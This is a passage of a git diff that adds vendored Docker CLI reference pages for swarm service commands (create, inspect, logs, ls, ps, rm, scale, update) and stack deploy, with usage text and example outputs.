\ + --replicas 3 \ + --mount type=volume,destination=/path/in/container \ + nginx:alpine +``` + +In this example, no name (`source`) is specified for the volume, so a new volume +is created for each task. This guarantees that each task gets its own volume, +and volumes are not shared between tasks. Anonymous volumes are removed after +the task using them is complete. + +#### Create a service that uses a bind-mounted host directory + +The following example bind-mounts a host directory at `/path/in/container` in +the containers backing the service: + +```bash +$ docker service create \ + --name my-service \ + --mount type=bind,source=/path/on/host,destination=/path/in/container \ + nginx:alpine +``` + +### Set service mode (--mode) + +The service mode determines whether this is a _replicated_ service or a _global_ +service. A replicated service runs as many tasks as specified, while a global +service runs on each active node in the swarm. + +The following command creates a global service: + +```bash +$ docker service create \ + --name redis_2 \ + --mode global \ + redis:3.0.6 +``` + +### Specify service constraints (--constraint) + +You can limit the set of nodes where a task can be scheduled by defining +constraint expressions. Multiple constraints find nodes that satisfy every +expression (AND match). Constraints can match node or Docker Engine labels as +follows: + +| node attribute | matches | example | +|:----------------|:--------------------------|:------------------------------------------------| +| node.id | node ID | `node.id == 2ivku8v2gvtg4` | +| node.hostname | node hostname | `node.hostname != node-2` | +| node.role | node role: manager | `node.role == manager` | +| node.labels | user defined node labels | `node.labels.security == high` | +| engine.labels | Docker Engine's labels | `engine.labels.operatingsystem == ubuntu 14.04` | + +`engine.labels` apply to Docker Engine labels like operating system, +drivers, etc. Swarm administrators add `node.labels` for operational purposes by +using the [`docker node update`](node_update.md) command. + +For example, the following limits tasks for the redis service to nodes where the +node type label equals queue: + +```bash +$ docker service create \ + --name redis_2 \ + --constraint 'node.labels.type == queue' \ + redis:3.0.6 +``` + +### Attach a service to an existing network (--network) + +You can use overlay networks to connect one or more services within the swarm. + +First, create an overlay network on a manager node the docker network create +command: + +```bash +$ docker network create --driver overlay my-network + +etjpu59cykrptrgw0z0hk5snf +``` + +After you create an overlay network in swarm mode, all manager nodes have +access to the network. + +When you create a service and pass the --network flag to attach the service to +the overlay network: + +```bash +$ docker service create \ + --replicas 3 \ + --network my-network \ + --name my-web \ + nginx + +716thylsndqma81j6kkkb5aus +``` + +The swarm extends my-network to each node running the service. + +Containers on the same network can access each other using +[service discovery](https://docs.docker.com/engine/swarm/networking/#use-swarm-mode-service-discovery). + +### Publish service ports externally to the swarm (-p, --publish) + +You can publish service ports to make them available externally to the swarm +using the `--publish` flag: + +```bash +$ docker service create --publish : nginx +``` + +For example: + +```bash +$ docker service create --name my_web --replicas 3 --publish 8080:80 nginx +``` + +When you publish a service port, the swarm routing mesh makes the service +accessible at the target port on every node regardless if there is a task for +the service running on the node. For more information refer to +[Use swarm mode routing mesh](https://docs.docker.com/engine/swarm/ingress/). + +### Publish a port for TCP only or UDP only + +By default, when you publish a port, it is a TCP port. You can +specifically publish a UDP port instead of or in addition to a TCP port. When +you publish both TCP and UDP ports, Docker 1.12.2 and earlier require you to +add the suffix `/tcp` for TCP ports. Otherwise it is optional. + +#### TCP only + +The following two commands are equivalent. + +```bash +$ docker service create --name dns-cache -p 53:53 dns-cache + +$ docker service create --name dns-cache -p 53:53/tcp dns-cache +``` + +#### TCP and UDP + +```bash +$ docker service create --name dns-cache -p 53:53/tcp -p 53:53/udp dns-cache +``` + +#### UDP only + +```bash +$ docker service create --name dns-cache -p 53:53/udp dns-cache +``` + +### Create services using templates + +You can use templates for some flags of `service create`, using the syntax +provided by the Go's [text/template](http://golange.org/pkg/text/template/) package. + +The supported flags are the following : + +- `--hostname` +- `--mount` +- `--env` + +Valid placeholders for the Go template are listed below: + +Placeholder | Description +----------------- | -------------------------------------------- +`.Service.ID` | Service ID +`.Service.Name` | Service name +`.Service.Labels` | Service labels +`.Node.ID` | Node ID +`.Task.ID` | Task ID +`.Task.Name` | Task name +`.Task.Slot` | Task slot + +#### Template example + +In this example, we are going to set the template of the created containers based on the +service's name and the node's ID where it sits. + +```bash +$ docker service create --name hosttempl --hostname={% raw %}"{{.Node.ID}}-{{.Service.Name}}"{% endraw %} busybox top +va8ew30grofhjoychbr6iot8c + +$ docker service ps va8ew30grofhjoychbr6iot8c +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +wo41w8hg8qan hosttempl.1 busybox:latest@sha256:29f5d56d12684887bdfa50dcd29fc31eea4aaf4ad3bec43daf19026a7ce69912 2e7a8a9c4da2 Running Running about a minute ago + +$ docker inspect --format={% raw %}"{{.Config.Hostname}}"{% endraw %} hosttempl.1.wo41w8hg8qanxwjwsg4kxpprj +x3ti0erg11rjpg64m75kej2mz-hosttempl +``` + +## Related information + +* [service inspect](service_inspect.md) +* [service logs](service_logs.md) +* [service ls](service_ls.md) +* [service rm](service_rm.md) +* [service scale](service_scale.md) +* [service ps](service_ps.md) +* [service update](service_update.md) + + diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md new file mode 100644 index 0000000000..8b4ab62d89 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md @@ -0,0 +1,162 @@ +--- +title: "service inspect" +description: "The service inspect command description and usage" +keywords: "service, inspect" +--- + + + +# service inspect + +```Markdown +Usage: docker service inspect [OPTIONS] SERVICE [SERVICE...] + +Display detailed information on one or more services + +Options: + -f, --format string Format the output using the given Go template + --help Print usage + --pretty Print the information in a human friendly format. +``` + + +Inspects the specified service. This command has to be run targeting a manager +node. + +By default, this renders all results in a JSON array. If a format is specified, +the given template will be executed for each result. + +Go's [text/template](http://golang.org/pkg/text/template/) package +describes all the details of the format. + +## Examples + +### Inspecting a service by name or ID + +You can inspect a service, either by its *name*, or *ID* + +For example, given the following service; + +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +dmu1ept4cxcf redis replicated 3/3 redis:3.0.6 +``` + +Both `docker service inspect redis`, and `docker service inspect dmu1ept4cxcf` +produce the same result: + +```bash +$ docker service inspect redis +[ + { + "ID": "dmu1ept4cxcfe8k8lhtux3ro3", + "Version": { + "Index": 12 + }, + "CreatedAt": "2016-06-17T18:44:02.558012087Z", + "UpdatedAt": "2016-06-17T18:44:02.558012087Z", + "Spec": { + "Name": "redis", + "TaskTemplate": { + "ContainerSpec": { + "Image": "redis:3.0.6" + }, + "Resources": { + "Limits": {}, + "Reservations": {} + }, + "RestartPolicy": { + "Condition": "any", + "MaxAttempts": 0 + }, + "Placement": {} + }, + "Mode": { + "Replicated": { + "Replicas": 1 + } + }, + "UpdateConfig": {}, + "EndpointSpec": { + "Mode": "vip" + } + }, + "Endpoint": { + "Spec": {} + } + } +] +``` + +```bash +$ docker service inspect dmu1ept4cxcf +[ + { + "ID": "dmu1ept4cxcfe8k8lhtux3ro3", + "Version": { + "Index": 12 + }, + ... + } +] +``` + +### Inspect a service using pretty-print + +You can print the inspect output in a human-readable format instead of the default +JSON output, by using the `--pretty` option: + +```bash +$ docker service inspect --pretty frontend +ID: c8wgl7q4ndfd52ni6qftkvnnp +Name: frontend +Labels: + - org.example.projectname=demo-app +Service Mode: REPLICATED + Replicas: 5 +Placement: +UpdateConfig: + Parallelism: 0 +ContainerSpec: + Image: nginx:alpine +Resources: +Endpoint Mode: vip +Ports: + Name = + Protocol = tcp + TargetPort = 443 + PublishedPort = 4443 +``` + +You can also use `--format pretty` for the same effect. + + +### Finding the number of tasks running as part of a service + +The `--format` option can be used to obtain specific information about a +service. For example, the following command outputs the number of replicas +of the "redis" service. + +```bash{% raw %} +$ docker service inspect --format='{{.Spec.Mode.Replicated.Replicas}}' redis +10 +{% endraw %}``` + + +## Related information + +* [service create](service_create.md) +* [service logs](service_logs.md) +* [service ls](service_ls.md) +* [service rm](service_rm.md) +* [service scale](service_scale.md) +* [service ps](service_ps.md) +* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md new file mode 100644 index 0000000000..fdf6a3a245 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md @@ -0,0 +1,77 @@ +--- +title: "service logs (experimental)" +description: "The service logs command description and usage" +keywords: "service, logs" +advisory: "experimental" +--- + + + +# service logs + +```Markdown +Usage: docker service logs [OPTIONS] SERVICE + +Fetch the logs of a service + +Options: + --details Show extra details provided to logs + -f, --follow Follow log output + --help Print usage + --since string Show logs since timestamp + --tail string Number of lines to show from the end of the logs (default "all") + -t, --timestamps Show timestamps +``` + +The `docker service logs` command batch-retrieves logs present at the time of execution. + +> **Note**: this command is only functional for services that are started with +> the `json-file` or `journald` logging driver. + +For more information about selecting and configuring logging drivers, refer to +[Configure logging drivers](https://docs.docker.com/engine/admin/logging/overview/). + +The `docker service logs --follow` command will continue streaming the new output from +the service's `STDOUT` and `STDERR`. + +Passing a negative number or a non-integer to `--tail` is invalid and the +value is set to `all` in that case. + +The `docker service logs --timestamps` command will add an [RFC3339Nano timestamp](https://golang.org/pkg/time/#pkg-constants) +, for example `2014-09-16T06:17:46.000000000Z`, to each +log entry. To ensure that the timestamps are aligned the +nano-second part of the timestamp will be padded with zero when necessary. + +The `docker service logs --details` command will add on extra attributes, such as +environment variables and labels, provided to `--log-opt` when creating the +service. + +The `--since` option shows only the service logs generated after +a given date. You can specify the date as an RFC 3339 date, a UNIX +timestamp, or a Go duration string (e.g. `1m30s`, `3h`). Besides RFC3339 date +format you may also use RFC3339Nano, `2006-01-02T15:04:05`, +`2006-01-02T15:04:05.999999999`, `2006-01-02Z07:00`, and `2006-01-02`. The local +timezone on the client will be used if you do not provide either a `Z` or a +`+-00:00` timezone offset at the end of the timestamp. When providing Unix +timestamps enter seconds[.nanoseconds], where seconds is the number of seconds +that have elapsed since January 1, 1970 (midnight UTC/GMT), not counting leap +seconds (aka Unix epoch or Unix time), and the optional .nanoseconds field is a +fraction of a second no more than nine digits long. You can combine the +`--since` option with either or both of the `--follow` or `--tail` options. + +## Related information + +* [service create](service_create.md) +* [service inspect](service_inspect.md) +* [service ls](service_ls.md) +* [service rm](service_rm.md) +* [service scale](service_scale.md) +* [service ps](service_ps.md) +* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md new file mode 100644 index 0000000000..ccd68af750 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md @@ -0,0 +1,114 @@ +--- +title: "service ls" +description: "The service ls command description and usage" +keywords: "service, ls" +--- + + + +# service ls + +```Markdown +Usage: docker service ls [OPTIONS] + +List services + +Aliases: + ls, list + +Options: + -f, --filter value Filter output based on conditions provided + --help Print usage + -q, --quiet Only display IDs +``` + +This command when run targeting a manager, lists services are running in the +swarm. + +On a manager node: +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +c8wgl7q4ndfd frontend replicated 5/5 nginx:alpine +dmu1ept4cxcf redis replicated 3/3 redis:3.0.6 +iwe3278osahj mongo global 7/7 mongo:3.3 +``` + +The `REPLICAS` column shows both the *actual* and *desired* number of tasks for +the service. + +## Filtering + +The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more +than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) + +The currently supported filters are: + +* [id](service_ls.md#id) +* [label](service_ls.md#label) +* [name](service_ls.md#name) + +#### ID + +The `id` filter matches all or part of a service's id. + +```bash +$ docker service ls -f "id=0bcjw" +ID NAME MODE REPLICAS IMAGE +0bcjwfh8ychr redis replicated 1/1 redis:3.0.6 +``` + +#### Label + +The `label` filter matches services based on the presence of a `label` alone or +a `label` and a value. + +The following filter matches all services with a `project` label regardless of +its value: + +```bash +$ docker service ls --filter label=project +ID NAME MODE REPLICAS IMAGE +01sl1rp6nj5u frontend2 replicated 1/1 nginx:alpine +36xvvwwauej0 frontend replicated 5/5 nginx:alpine +74nzcxxjv6fq backend replicated 3/3 redis:3.0.6 +``` + +The following filter matches only services with the `project` label with the +`project-a` value. + +```bash +$ docker service ls --filter label=project=project-a +ID NAME MODE REPLICAS IMAGE +36xvvwwauej0 frontend replicated 5/5 nginx:alpine +74nzcxxjv6fq backend replicated 3/3 redis:3.0.6 +``` + +#### Name + +The `name` filter matches on all or part of a service's name. + +The following filter matches services with a name containing `redis`. + +```bash +$ docker service ls --filter name=redis +ID NAME MODE REPLICAS IMAGE +0bcjwfh8ychr redis replicated 1/1 redis:3.0.6 +``` + +## Related information + +* [service create](service_create.md) +* [service inspect](service_inspect.md) +* [service logs](service_logs.md) +* [service rm](service_rm.md) +* [service scale](service_scale.md) +* [service ps](service_ps.md) +* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md new file mode 100644 index 0000000000..61abb15f67 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md @@ -0,0 +1,161 @@ +--- +title: "service ps" +description: "The service ps command description and usage" +keywords: "service, tasks, ps" +aliases: ["/engine/reference/commandline/service_tasks/"] +--- + + + +# service ps + +```Markdown +Usage: docker service ps [OPTIONS] SERVICE + +List the tasks of a service + +Options: + -f, --filter filter Filter output based on conditions provided + --help Print usage + --no-resolve Do not map IDs to Names + --no-trunc Do not truncate output + -q, --quiet Only display task IDs +``` + +Lists the tasks that are running as part of the specified service. This command +has to be run targeting a manager node. + +## Examples + +### Listing the tasks that are part of a service + +The following command shows all the tasks that are part of the `redis` service: + +```bash +$ docker service ps redis + +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +0qihejybwf1x redis.1 redis:3.0.5 manager1 Running Running 8 seconds +bk658fpbex0d redis.2 redis:3.0.5 worker2 Running Running 9 seconds +5ls5s5fldaqg redis.3 redis:3.0.5 worker1 Running Running 9 seconds +8ryt076polmc redis.4 redis:3.0.5 worker1 Running Running 9 seconds +1x0v8yomsncd redis.5 redis:3.0.5 manager1 Running Running 8 seconds +71v7je3el7rr redis.6 redis:3.0.5 worker2 Running Running 9 seconds +4l3zm9b7tfr7 redis.7 redis:3.0.5 worker2 Running Running 9 seconds +9tfpyixiy2i7 redis.8 redis:3.0.5 worker1 Running Running 9 seconds +3w1wu13yupln redis.9 redis:3.0.5 manager1 Running Running 8 seconds +8eaxrb2fqpbn redis.10 redis:3.0.5 manager1 Running Running 8 seconds +``` + +In addition to _running_ tasks, the output also shows the task history. For +example, after updating the service to use the `redis:3.0.6` image, the output +may look like this: + +```bash +$ docker service ps redis + +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +50qe8lfnxaxk redis.1 redis:3.0.6 manager1 Running Running 6 seconds ago +ky2re9oz86r9 \_ redis.1 redis:3.0.5 manager1 Shutdown Shutdown 8 seconds ago +3s46te2nzl4i redis.2 redis:3.0.6 worker2 Running Running less than a second ago +nvjljf7rmor4 \_ redis.2 redis:3.0.6 worker2 Shutdown Rejected 23 seconds ago "No such image: redis@sha256:6…" +vtiuz2fpc0yb \_ redis.2 redis:3.0.5 worker2 Shutdown Shutdown 1 second ago +jnarweeha8x4 redis.3 redis:3.0.6 worker1 Running Running 3 seconds ago +vs448yca2nz4 \_ redis.3 redis:3.0.5 worker1 Shutdown Shutdown 4 seconds ago +jf1i992619ir redis.4 redis:3.0.6 worker1 Running Running 10 seconds ago +blkttv7zs8ee \_ redis.4 redis:3.0.5 worker1 Shutdown Shutdown 11 seconds ago +``` + +The number of items in the task history is determined by the +`--task-history-limit` option that was set when initializing the swarm. You can +change the task history retention limit using the +[`docker swarm update`](swarm_update.md) command. + +When deploying a service, docker resolves the digest for the service's +image, and pins the service to that digest. The digest is not shown by +default, but is printed if `--no-trunc` is used. The `--no-trunc` option +also shows the non-truncated task ID, and error-messages, as can be seen below; + +```bash +$ docker service ps --no-trunc redis + +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +50qe8lfnxaxksi9w2a704wkp7 redis.1 redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842 manager1 Running Running 5 minutes ago +ky2re9oz86r9556i2szb8a8af \_ redis.1 redis:3.0.5@sha256:f8829e00d95672c48c60f468329d6693c4bdd28d1f057e755f8ba8b40008682e worker2 Shutdown Shutdown 5 minutes ago +bk658fpbex0d57cqcwoe3jthu redis.2 redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842 worker2 Running Running 5 seconds +nvjljf7rmor4htv7l8rwcx7i7 \_ redis.2 redis:3.0.6@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842 worker2 Shutdown Rejected 5 minutes ago "No such image: redis@sha256:6a692a76c2081888b589e26e6ec835743119fe453d67ecf03df7de5b73d69842" +``` + +## Filtering + +The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there +is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). +Multiple filter flags are combined as an `OR` filter. For example, +`-f name=redis.1 -f name=redis.7` returns both `redis.1` and `redis.7` tasks. + +The currently supported filters are: + +* [id](#id) +* [name](#name) +* [node](#node) +* [desired-state](#desired-state) + + +#### ID + +The `id` filter matches on all or a prefix of a task's ID. + +```bash +$ docker service ps -f "id=8" redis + +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +8ryt076polmc redis.4 redis:3.0.6 worker1 Running Running 9 seconds +8eaxrb2fqpbn redis.10 redis:3.0.6 manager1 Running Running 8 seconds +``` + +#### Name + +The `name` filter matches on task names. + +```bash +$ docker service ps -f "name=redis.1" redis +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +qihejybwf1x5 redis.1 redis:3.0.6 manager1 Running Running 8 seconds +``` + + +#### Node + +The `node` filter matches on a node name or a node ID. + +```bash +$ docker service ps -f "node=manager1" redis +ID NAME IMAGE NODE DESIRED STATE CURRENT STATE ERROR PORTS +0qihejybwf1x redis.1 redis:3.0.6 manager1 Running Running 8 seconds +1x0v8yomsncd redis.5 redis:3.0.6 manager1 Running Running 8 seconds +3w1wu13yupln redis.9 redis:3.0.6 manager1 Running Running 8 seconds +8eaxrb2fqpbn redis.10 redis:3.0.6 manager1 Running Running 8 seconds +``` + + +#### desired-state + +The `desired-state` filter can take the values `running`, `shutdown`, and `accepted`. + + +## Related information + +* [service create](service_create.md) +* [service inspect](service_inspect.md) +* [service logs](service_logs.md) +* [service ls](service_ls.md) +* [service rm](service_rm.md) +* [service scale](service_scale.md) +* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md new file mode 100644 index 0000000000..d0ba90b26d --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md @@ -0,0 +1,55 @@ +--- +title: "service rm" +description: "The service rm command description and usage" +keywords: "service, rm" +--- + + + +# service rm + +```Markdown +Usage: docker service rm SERVICE [SERVICE...] + +Remove one or more services + +Aliases: + rm, remove + +Options: + --help Print usage +``` + +Removes the specified services from the swarm. This command has to be run +targeting a manager node. + +For example, to remove the redis service: + +```bash +$ docker service rm redis +redis +$ docker service ls +ID NAME MODE REPLICAS IMAGE +``` + +> **Warning**: Unlike `docker rm`, this command does not ask for confirmation +> before removing a running service. + + + +## Related information + +* [service create](service_create.md) +* [service inspect](service_inspect.md) +* [service logs](service_logs.md) +* [service ls](service_ls.md) +* [service scale](service_scale.md) +* [service ps](service_ps.md) +* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md new file mode 100644 index 0000000000..64075ed092 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md @@ -0,0 +1,96 @@ +--- +title: "service scale" +description: "The service scale command description and usage" +keywords: "service, scale" +--- + + + +# service scale + +```markdown +Usage: docker service scale SERVICE=REPLICAS [SERVICE=REPLICAS...] + +Scale one or multiple replicated services + +Options: + --help Print usage +``` + +## Examples + +### Scale a service + +The scale command enables you to scale one or more replicated services either up +or down to the desired number of replicas. This command cannot be applied on +services which are global mode. The command will return immediately, but the +actual scaling of the service may take some time. To stop all replicas of a +service while keeping the service active in the swarm you can set the scale to 0. + +For example, the following command scales the "frontend" service to 50 tasks. + +```bash +$ docker service scale frontend=50 +frontend scaled to 50 +``` + +The following command tries to scale a global service to 10 tasks and returns an error. + +``` +$ docker service create --mode global --name backend backend:latest +b4g08uwuairexjub6ome6usqh +$ docker service scale backend=10 +backend: scale can only be used with replicated mode +``` + +Directly afterwards, run `docker service ls`, to see the actual number of +replicas. + +```bash +$ docker service ls --filter name=frontend + +ID NAME MODE REPLICAS IMAGE +3pr5mlvu3fh9 frontend replicated 15/50 nginx:alpine +``` + +You can also scale a service using the [`docker service update`](service_update.md) +command. The following commands are equivalent: + +```bash +$ docker service scale frontend=50 +$ docker service update --replicas=50 frontend +``` + +### Scale multiple services + +The `docker service scale` command allows you to set the desired number of +tasks for multiple services at once. The following example scales both the +backend and frontend services: + +```bash +$ docker service scale backend=3 frontend=5 +backend scaled to 3 +frontend scaled to 5 + +$ docker service ls +ID NAME MODE REPLICAS IMAGE +3pr5mlvu3fh9 frontend replicated 5/5 nginx:alpine +74nzcxxjv6fq backend replicated 3/3 redis:3.0.6 +``` + +## Related information + +* [service create](service_create.md) +* [service inspect](service_inspect.md) +* [service logs](service_logs.md) +* [service ls](service_ls.md) +* [service rm](service_rm.md) +* [service ps](service_ps.md) +* [service update](service_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md new file mode 100644 index 0000000000..301a0eabe8 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/service_update.md @@ -0,0 +1,181 @@ +--- +title: "service update" +description: "The service update command description and usage" +keywords: "service, update" +--- + + + +# service update + +```Markdown +Usage: docker service update [OPTIONS] SERVICE + +Update a service + +Options: + --args string Service command args + --constraint-add list Add or update a placement constraint (default []) + --constraint-rm list Remove a constraint (default []) + --container-label-add list Add or update a container label (default []) + --container-label-rm list Remove a container label by its key (default []) + --dns-add list Add or update a custom DNS server (default []) + --dns-option-add list Add or update a DNS option (default []) + --dns-option-rm list Remove a DNS option (default []) + --dns-rm list Remove a custom DNS server (default []) + --dns-search-add list Add or update a custom DNS search domain (default []) + --dns-search-rm list Remove a DNS search domain (default []) + --endpoint-mode string Endpoint mode (vip or dnsrr) + --env-add list Add or update an environment variable (default []) + --env-rm list Remove an environment variable (default []) + --force Force update even if no changes require it + --group-add list Add an additional supplementary user group to the container (default []) + --group-rm list Remove a previously added supplementary user group from the container (default []) + --health-cmd string Command to run to check health + --health-interval duration Time between running the check (ns|us|ms|s|m|h) + --health-retries int Consecutive failures needed to report unhealthy + --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) + --help Print usage + --host-add list Add or update a custom host-to-IP mapping (host:ip) (default []) + --host-rm list Remove a custom host-to-IP mapping (host:ip) (default []) + --hostname string Container hostname + --image string Service image tag + --label-add list Add or update a service label (default []) + --label-rm list Remove a label by its key (default []) + --limit-cpu decimal Limit CPUs (default 0.000) + --limit-memory bytes Limit Memory (default 0 B) + --log-driver string Logging driver for service + --log-opt list Logging driver options (default []) + --mount-add mount Add or update a mount on a service + --mount-rm list Remove a mount by its target path (default []) + --no-healthcheck Disable any container-specified HEALTHCHECK + --publish-add port Add or update a published port + --publish-rm port Remove a published port by its target port + --replicas uint Number of tasks + --reserve-cpu decimal Reserve CPUs (default 0.000) + --reserve-memory bytes Reserve Memory (default 0 B) + --restart-condition string Restart when condition is met (none, on-failure, or any) + --restart-delay duration Delay between restart attempts (ns|us|ms|s|m|h) + --restart-max-attempts uint Maximum number of restarts before giving up + --restart-window duration Window used to evaluate the restart policy (ns|us|ms|s|m|h) + --rollback Rollback to previous specification + --secret-add secret Add or update a secret on a service + --secret-rm list Remove a secret (default []) + --stop-grace-period duration Time to wait before force killing a container (ns|us|ms|s|m|h) + -t, --tty Allocate a pseudo-TTY + --update-delay duration Delay between updates (ns|us|ms|s|m|h) (default 0s) + --update-failure-action string Action on update failure (pause|continue) (default "pause") + --update-max-failure-ratio float Failure rate to tolerate during an update + --update-monitor duration Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s) + --update-parallelism uint Maximum number of tasks updated simultaneously (0 to update all at once) (default 1) + -u, --user string Username or UID (format: [:]) + --with-registry-auth Send registry authentication details to swarm agents + -w, --workdir string Working directory inside the container +``` + +Updates a service as described by the specified parameters. This command has to be run targeting a manager node. +The parameters are the same as [`docker service create`](service_create.md). Please look at the description there +for further information. + +Normally, updating a service will only cause the service's tasks to be replaced with new ones if a change to the +service requires recreating the tasks for it to take effect. For example, only changing the +`--update-parallelism` setting will not recreate the tasks, because the individual tasks are not affected by this +setting. However, the `--force` flag will cause the tasks to be recreated anyway. This can be used to perform a +rolling restart without any changes to the service parameters. + +## Examples + +### Update a service + +```bash +$ docker service update --limit-cpu 2 redis +``` + +### Perform a rolling restart with no parameter changes + +```bash +$ docker service update --force --update-parallelism 1 --update-delay 30s redis +``` + +In this example, the `--force` flag causes the service's tasks to be shut down +and replaced with new ones even though none of the other parameters would +normally cause that to happen. The `--update-parallelism 1` setting ensures +that only one task is replaced at a time (this is the default behavior). The +`--update-delay 30s` setting introduces a 30 second delay between tasks, so +that the rolling restart happens gradually. + +### Adding and removing mounts + +Use the `--mount-add` or `--mount-rm` options add or remove a service's bind-mounts +or volumes. + +The following example creates a service which mounts the `test-data` volume to +`/somewhere`. The next step updates the service to also mount the `other-volume` +volume to `/somewhere-else`volume, The last step unmounts the `/somewhere` mount +point, effectively removing the `test-data` volume. Each command returns the +service name. + +- The `--mount-add` flag takes the same parameters as the `--mount` flag on + `service create`. Refer to the [volumes and + bind-mounts](service_create.md#volumes-and-bind-mounts-mount) section in the + `service create` reference for details. + +- The `--mount-rm` flag takes the `target` path of the mount. + +```bash +$ docker service create \ + --name=myservice \ + --mount \ + type=volume,source=test-data,target=/somewhere \ + nginx:alpine \ + myservice + +myservice + +$ docker service update \ + --mount-add \ + type=volume,source=other-volume,target=/somewhere-else \ + myservice + +myservice + +$ docker service update --mount-rm /somewhere myservice + +myservice +``` + +### Adding and removing secrets + +Use the `--secret-add` or `--secret-rm` options add or remove a service's +secrets. + +The following example adds a secret named `ssh-2` and removes `ssh-1`: + +```bash +$ docker service update \ + --secret-add source=ssh-2,target=ssh-2 \ + --secret-rm ssh-1 \ + myservice +``` + +### Update services using templates + +Some flags of `service update` support the use of templating. +See [`service create`](./service_create.md#templating) for the reference. + +## Related information + +* [service create](service_create.md) +* [service inspect](service_inspect.md) +* [service logs](service_logs.md) +* [service ls](service_ls.md) +* [service ps](service_ps.md) +* [service rm](service_rm.md) +* [service scale](service_scale.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md b/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md new file mode 100644 index 0000000000..037feaebd7 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md @@ -0,0 +1,98 @@ +--- +title: "stack deploy" +description: "The stack deploy command description and usage" +keywords: "stack, deploy, up" +--- + + + +# stack deploy + +```markdown +Usage: docker stack deploy [OPTIONS] STACK + +Deploy a new stack or update an existing stack + +Aliases: + deploy, up + +Options: + --bundle-file string Path to a Distributed Application Bundle file + -c, --compose-file string Path to a Compose file + --help Print usage + --with-registry-auth Send registry authentication details to Swarm agents +``` + +Create and update a stack from a `compose` or a `dab` file on the swarm. This command +has to be run targeting a manager node. + +## Compose file + +The `deploy` command supports compose file version `3.0` and above." + +```bash +$ docker stack deploy --compose-file docker-compose.yml vossibility +Ignoring unsupported options: links + +Creating network vossibility_vossibility +Creating network vossibility_default +Creating service vossibility_nsqd +Creating service vossibility_logstash +Creating service vossibility_elasticsearch +Creating service vossibility_kibana +Creating service vossibility_ghollector +Creating service vossibility_lookupd +``` + +You can verify that the services were correctly created + +``` +$ docker service ls +ID NAME MODE REPLICAS IMAGE +29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4awt47624qwh vossibility_nsqd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4tjx9biia6fs vossibility_elasticsearch replicated 1/1 elasticsearch@sha256:12ac7c6af55d001f71800b83ba91a04f716e58d82e748fa6e5a7359eed2301aa +7563uuzr9eys vossibility_kibana replicated 1/1 kibana@sha256:6995a2d25709a62694a937b8a529ff36da92ebee74bafd7bf00e6caf6db2eb03 +9gc5m4met4he vossibility_logstash replicated 1/1 logstash@sha256:2dc8bddd1bb4a5a34e8ebaf73749f6413c101b2edef6617f2f7713926d2141fe +axqh55ipl40h vossibility_vossibility-collector replicated 1/1 icecrime/vossibility-collector@sha256:f03f2977203ba6253988c18d04061c5ec7aab46bca9dfd89a9a1fa4500989fba +``` + +## DAB file + +```bash +$ docker stack deploy --bundle-file vossibility-stack.dab vossibility +Loading bundle from vossibility-stack.dab +Creating service vossibility_elasticsearch +Creating service vossibility_kibana +Creating service vossibility_logstash +Creating service vossibility_lookupd +Creating service vossibility_nsqd +Creating service vossibility_vossibility-collector +``` + +You can verify that the services were correctly created: + +```bash +$ docker service ls +ID NAME MODE REPLICAS IMAGE +29bv0vnlm903 vossibility_lookupd replicated 1/1 nsqio/nsq@sha256:eeba05599f31eba418e96e71e0984c3dc96963ceb66924dd37a47bf7ce18a662 +4awt47624qwh vossibility_nsqd replicated 1/1 